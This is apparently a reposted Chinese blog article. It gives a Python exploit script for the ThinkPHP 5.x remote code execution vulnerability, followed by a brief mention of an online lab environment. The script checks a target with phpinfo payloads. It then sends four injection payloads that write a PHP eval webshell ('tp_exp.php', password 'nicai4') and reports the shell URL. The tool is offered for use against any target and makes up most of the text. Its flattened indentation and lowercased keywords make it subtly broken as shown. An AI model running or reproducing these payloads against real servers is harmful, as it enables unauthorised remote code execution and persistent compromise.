加了三个验证漏洞以及四个getshell方法
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
|
# /usr/bin/env python3
# -*- coding: utf-8 -*-
# @author: morker
# @email: [email]admin@nsf.me[/email]
# @blog: [url]http://nsf.me/[/url]
import requests
import sys
def demo():
print(' _______ _ _ _ _____ _ _ _____ ')
print(' |__ __| | (_) | | | __ \| | | | __ \ ')
print(' | | | |__ _ _ __ | | _| |__) | |__| | |__) |')
print(''' | | | '_ \| | '_ \| |/ / ___/| __ | ___/ ''')
print(' | | | | | | | | | | <| | | | | | | ')
print(' |_| |_| |_|_|_| |_|_|\_\_| |_| |_|_| ')
print()
print('\tthinkphp 5.x (v5.0.23 and v5.1.31 following version).')
print('\tremote command execution exploit.')
print('\tvulnerability verification and getshell.')
print('\ttarget: http://target/public')
print()
class thinkphp():
def __init__(self,web):
self.web = web
self.headers = {
"user-agent" : "mozilla/5.0 (windows nt 10.0; win64; x64; rv:63.0) gecko/20100101 firefox/63.0",
"accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"accept-language" : "zh-cn,zh;q=0.8,zh-tw;q=0.7,zh-hk;q=0.5,en-us;q=0.3,en;q=0.2",
"accept-encoding" : "gzip, deflate",
"content-type" : "application/x-www-form-urlencoded",
"connection" : "keep-alive"
}
def verification(self):
i = 0
s = 0
verifications = ['/?s=index/\\think\request/input&filter=phpinfo&data=1','/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1','/?s=index/\\think\container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1']
while true:
if i == len(verifications):
break
else:
url = self.web + verifications[i]
req = requests.get(url=url,headers=self.headers)
if 'phpinfo()' in req.text:
s = 1
break
else:
s = 0
i += 1
if s == 1:
print("[+] there are vulnerabilities.")
print()
toshell = input("[*] getshell? (y/n):")
if toshell == 'y':
self.getshell()
elif toshell == 'n':
sys.exit()
else:
sys.exit()
else:
print("[-] there are no vulnerabilities.")
def getshell(self):
getshells = [
'?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_post[nicai4]); ?>',
'?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_post[nicai4]);%20?>%27%20>>%20tp_exp.php',
'?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_post[nicai4]);%20?^>%20>>tp_exp.php',
'?s=index/\\think\\template\driver\\file/write&cachefile=tp_exp.php&content=<?php%20eval($_post[nicai4]);?>']
shell = self.web + '/tp_exp.php'
i = 0
s = 0
while true:
if i == len(getshells):
break
else:
url = self.web + getshells[i]
req = requests.get(url=url,headers=self.headers)
req_shell = requests.get(url=shell,headers=self.headers)
if req_shell.status_code == 200:
s = 1
break
else:
s = 0
i += 1
if s == 1:
print("[+] webshell :%s password :nicai4" % shell)
else:
print("[-] the vulnerability does not exist or exists waf.")
def main():
demo()
url = input("[*] please input your target: ")
run = thinkphp(url)
run.verification()
if __name__ == '__main__':
main()
|
注:图中的测试网址为在线漏洞环境,可自己去在线搭建测试。
环境地址:https://www.vsplate.com/
效果图:
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持服务器之家。
原文链接:https://bbs.ichunqiu.com/thread-48729-1-1.html